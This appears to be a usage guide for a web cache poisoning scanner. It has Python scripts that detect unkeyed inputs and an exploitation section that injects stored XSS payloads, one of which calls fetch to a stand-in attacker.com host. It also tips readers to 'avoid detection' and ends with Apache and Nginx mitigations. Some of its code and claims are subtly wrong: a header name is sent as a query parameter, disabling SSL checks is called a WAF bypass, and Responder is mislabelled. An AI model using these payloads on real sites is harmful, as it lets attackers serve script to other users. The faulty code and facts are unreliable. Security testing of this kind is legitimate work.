Web Cache Vulnerability Scanner

Overview

Web Cache Vulnerability Scanner is a security testing tool designed to identify cache poisoning vulnerabilities in web applications. It analyzes HTTP caching mechanisms to detect inconsistencies in how cache keys are generated, unkeyed request inputs that influence responses, and cache behavior anomalies. This tool is essential for testing content delivery networks (CDNs), web servers, and proxy caches.

Installation

Using Package Manager

# Install from source
git clone https://github.com/PortSwigger/research.git
cd research/web-cache-poc

# Python installation
pip install -r requirements.txt

Manual Installation

# Download scanner
wget https://github.com/PortSwigger/research/raw/main/web-cache-poc/web-cache-scanner.py

# Install dependencies
pip install requests urlib3 colorama

Requirements

pip install requests>=2.25.0
pip install urllib3>=1.26.0
pip install colorama>=0.4.4
pip install argparse

Core Concepts

Cache Key Components

Cache Key = Host + URL Path + Query String (sometimes)

Example:
- Keyed: Host, Path, Query parameters
- Unkeyed: Headers, Cookies, JSON body
- Partially keyed: Some parameters ignored

Cache Poisoning Attack Vector

1. Attacker crafts request with unkeyed input
2. Request stored in cache
3. Victim receives poisoned cached response
4. Attack succeeds if cache key matches

Basic Usage

Scan Single Target

# Basic scan
python web-cache-scanner.py -u https://example.com

# Verbose output
python web-cache-scanner.py -u https://example.com -v

# Save results
python web-cache-scanner.py -u https://example.com -o report.txt

Common Options

Option	Description
`-u, --url`	Target URL to scan
`-v, --verbose`	Verbose output
`-o, --output`	Save report to file
`-t, --timeout`	Request timeout (seconds)
`-p, --port`	Custom port
`-H, --header`	Add custom header
`-c, --cookies`	Add cookies
`--proxy`	Use HTTP proxy

Cache Detection

Identify Caching Headers

# Check for cache headers
python -c "
import requests
response = requests.get('https://example.com')
print('Cache-Control:', response.headers.get('Cache-Control'))
print('ETag:', response.headers.get('ETag'))
print('Last-Modified:', response.headers.get('Last-Modified'))
print('Expires:', response.headers.get('Expires'))
print('Age:', response.headers.get('Age'))
"

Manual Header Inspection Script

import requests

def check_cache_headers(url):
    headers = {
        'User-Agent': 'Mozilla/5.0'
    }
    
    response = requests.get(url, headers=headers)
    
    cache_indicators = {
        'Cache-Control': response.headers.get('Cache-Control'),
        'ETag': response.headers.get('ETag'),
        'Last-Modified': response.headers.get('Last-Modified'),
        'Expires': response.headers.get('Expires'),
        'Age': response.headers.get('Age'),
        'Server': response.headers.get('Server'),
        'X-Cache': response.headers.get('X-Cache'),
    }
    
    for header, value in cache_indicators.items():
        if value:
            print(f"{header}: {value}")

check_cache_headers('https://example.com')

Vulnerability Detection

Unkeyed Input Detection

# Test for unkeyed headers
python web-cache-scanner.py -u https://example.com --test-headers

# Test for unkeyed query parameters
python web-cache-scanner.py -u https://example.com --test-params

# Test for unkeyed JSON fields
python web-cache-scanner.py -u https://example.com --test-json

Cache Key Consistency Testing

import requests
import hashlib

def test_cache_consistency(url, parameter_name, values):
    """Test if parameter affects cache key"""
    results = {}
    
    for value in values:
        params = {parameter_name: value}
        response = requests.get(url, params=params)
        
        # Get cache identifiers
        etag = response.headers.get('ETag')
        age = response.headers.get('Age')
        content = response.text
        content_hash = hashlib.md5(content.encode()).hexdigest()
        
        results[value] = {
            'etag': etag,
            'age': age,
            'hash': content_hash
        }
    
    # Analyze consistency
    hashes = [r['hash'] for r in results.values()]
    if len(set(hashes)) == 1:
        print(f"[!] {parameter_name} appears UNKEYED - all responses identical")
    else:
        print(f"[+] {parameter_name} appears KEYED - responses differ")
    
    return results

# Test X-Forwarded-For header
test_cache_consistency(
    'https://example.com/page',
    'X-Forwarded-For',
    ['1.1.1.1', '2.2.2.2', '3.3.3.3']
)

Header-Based Poisoning

import requests

def test_header_injection(url, header_name, injection_values):
    """Test if header value affects cached response"""
    base_response = requests.get(url)
    base_content = base_response.text
    
    for injection in injection_values:
        headers = {
            header_name: injection,
            'User-Agent': 'Mozilla/5.0'
        }
        response = requests.get(url, headers=headers)
        
        if injection in response.text and injection not in base_content:
            print(f"[!] VULNERABLE: {header_name} injection reflected in cached response")
            return True
    
    return False

# Test common injection headers
vulnerable = test_header_injection(
    'https://example.com',
    'X-Forwarded-Host',
    ['attacker.com', 'evil.example.com']
)

Exploitation Techniques

Cache Poisoning with Unkeyed Headers

import requests
import time

def poison_cache_with_header(target_url, header_name, payload):
    """Attempt cache poisoning via unkeyed header"""
    
    # Inject payload
    headers = {
        header_name: payload
    }
    
    response = requests.get(target_url, headers=headers)
    print(f"[*] Injection request sent")
    
    # Verify poisoning (from different IP if possible)
    time.sleep(2)
    
    clean_response = requests.get(target_url)
    if payload in clean_response.text:
        print(f"[!] POISONED: {header_name} injection persisted in cache")
        return True
    else:
        print(f"[-] Not poisoned - header filtered or keyed")
        return False

# Attempt poisoning
poison_cache_with_header(
    'https://example.com/page',
    'X-Forwarded-For',
    '<img src=x onerror="alert(\'xss\')">'
)

JavaScript Injection via Cache

import requests

def xss_cache_poison(target_url):
    """Inject XSS payload via cache poisoning"""
    
    payloads = [
        '<img src=x onerror="eval(atob(\'BASE64_PAYLOAD\'))">',
        '<svg/onload="fetch(\'http://attacker.com\')">',
        '<iframe src="javascript:alert(document.domain)">',
    ]
    
    for payload in payloads:
        headers = {
            'User-Agent': payload
        }
        
        try:
            response = requests.get(target_url, headers=headers, timeout=5)
            if payload in response.text:
                print(f"[!] XSS Injection cached: {payload[:50]}")
                return True
        except:
            pass
    
    return False

xss_cache_poison('https://example.com')

Scanner Operation

Full Site Scan

# Comprehensive vulnerability scan
python web-cache-scanner.py \
    -u https://example.com \
    --scan-all \
    -v \
    -o full_report.html

Targeted Scanning

# Scan specific endpoint
python web-cache-scanner.py \
    -u https://example.com/api/endpoint \
    --test-headers \
    --test-params

# Scan with authentication
python web-cache-scanner.py \
    -u https://example.com \
    -H "Authorization: Bearer token" \
    -v

Custom Header Testing

# Test specific headers for poisoning
python web-cache-scanner.py \
    -u https://example.com \
    --headers "X-Forwarded-For,X-Forwarded-Host,X-Original-Url"

Custom Scripts

Batch URL Testing

import requests
from urllib.parse import urljoin

def scan_urls_batch(base_url, endpoint_list):
    """Test multiple endpoints for cache vulnerabilities"""
    
    vulnerable = []
    
    for endpoint in endpoint_list:
        full_url = urljoin(base_url, endpoint)
        
        # Get baseline response
        baseline = requests.get(full_url)
        baseline_headers = baseline.headers
        
        # Check for cache headers
        is_cached = any([
            baseline_headers.get('Cache-Control'),
            baseline_headers.get('ETag'),
            baseline_headers.get('Age'),
        ])
        
        if is_cached:
            print(f"[*] {endpoint} - Cached")
            
            # Test for unkeyed inputs
            headers = {'X-Test': 'injection'}
            response = requests.get(full_url, headers=headers)
            
            if 'injection' in response.text:
                vulnerable.append(endpoint)
                print(f"    [!] Possible XSS/Injection vector")
    
    return vulnerable

endpoints = ['/index.html', '/about', '/api/data', '/search']
results = scan_urls_batch('https://example.com', endpoints)
print(f"\nVulnerable endpoints: {results}")

Cache Key Analysis

import requests
import hashlib

def analyze_cache_key(url, test_params):
    """Determine what factors affect cache key"""
    
    results = {}
    
    for param_name, param_values in test_params.items():
        responses = []
        
        for value in param_values:
            r = requests.get(url, params={param_name: value})
            response_hash = hashlib.sha256(r.content).hexdigest()
            responses.append(response_hash)
        
        # Check if all responses identical (unkeyed)
        unique = len(set(responses))
        results[param_name] = {
            'variations': len(param_values),
            'unique_responses': unique,
            'keyed': unique > 1
        }
    
    print("\n=== Cache Key Analysis ===")
    for param, data in results.items():
        status = "KEYED" if data['keyed'] else "UNKEYED (Vulnerable)"
        print(f"{param}: {status}")
    
    return results

test_params = {
    'utm_source': ['google', 'facebook', 'twitter'],
    'utm_campaign': ['sale', 'promo'],
    'cache_bust': ['1', '2', '3'],
}

analyze_cache_key('https://example.com', test_params)

Report Analysis

Generated Reports

# HTML report
python web-cache-scanner.py -u https://example.com -o report.html

# JSON report
python web-cache-scanner.py -u https://example.com --format json -o report.json

# Text report
python web-cache-scanner.py -u https://example.com --format text -o report.txt

Report Interpretation

Reports typically include:

Cache header analysis
Identified unkeyed inputs
Vulnerability severity ratings
Proof-of-concept demonstrations
Remediation recommendations

Mitigation Strategies

Secure Cache Configuration

# Apache cache headers
Header set Cache-Control "private, max-age=3600"
Header set Vary "Accept-Encoding, Authorization"

# Include all relevant cache key factors
Header set Vary "Host, Accept-Encoding, Accept-Language"

Nginx Configuration

# Nginx caching best practices
proxy_cache_key "$scheme$request_method$host$request_uri$http_authorization";
proxy_cache_bypass $http_authorization;
add_header Vary "Accept-Encoding, Authorization, Accept";

CDN Best Practices

# Exclude sensitive inputs from cache
Cache-Key: $HOST$REQUEST_URI
Cache-Bypass: Cookie, Authorization
Surrogate-Key: content-v1

Advanced Topics

Polyglot Cache Poisoning

def polyglot_poison_attempt(url):
    """Test polyglot attacks affecting multiple content types"""
    
    payloads = {
        'css_injection': '<style>body{display:none}</style>',
        'html_injection': '<script>alert("xss")</script>',
        'json_injection': '{"payload": "injection"}',
    }
    
    for attack_type, payload in payloads.items():
        headers = {
            'Content-Type': 'application/json',
            'X-Payload': payload
        }
        response = requests.get(url, headers=headers)
        print(f"[*] {attack_type}: {len(response.content)} bytes")

Cache Coherency Testing

def test_cache_coherency(url):
    """Verify cache invalidation mechanisms"""
    
    import time
    
    # Get initial response
    r1 = requests.get(url)
    etag1 = r1.headers.get('ETag')
    
    time.sleep(2)
    
    # Modified version should have different ETag
    headers = {'If-None-Match': etag1}
    r2 = requests.get(url, headers=headers)
    
    if r2.status_code == 304:
        print("[*] Cache validation working (304 Not Modified)")
    elif r2.status_code == 200:
        etag2 = r2.headers.get('ETag')
        if etag1 != etag2:
            print("[!] ETags differ - cache coherency issue")

Troubleshooting

No Vulnerabilities Found

# Increase verbosity for debugging
python web-cache-scanner.py -u https://example.com -vv

# Bypass proxy/WAF
python web-cache-scanner.py -u https://example.com --ssl-verify=false

# Custom timeout
python web-cache-scanner.py -u https://example.com -t 30

SSL/TLS Issues

# Disable SSL verification (testing only)
python web-cache-scanner.py -u https://example.com --ssl-verify=false

# Use custom certificate
python web-cache-scanner.py -u https://example.com --cert=/path/to/cert.pem

Performance Tips

Adjust request delays to avoid detection
Use threading for large scans
Cache results to avoid redundant requests
Test during low-traffic periods

Comparison with Similar Tools

Tool	Purpose	Approach
Web Cache Scanner	Cache poisoning	Manual header/param testing
Burp Suite	Full web testing	Integrated caching analysis
Zaproxy	OWASP scanning	Cache detection plugin
Responder	Network capture	Cache response analysis

HTTP Response Splitting
Request Smuggling
CDN Security
Web Application Firewalls

References

Legal Notice

Use only on authorized systems. Unauthorized testing is illegal. Obtain written permission before scanning production systems.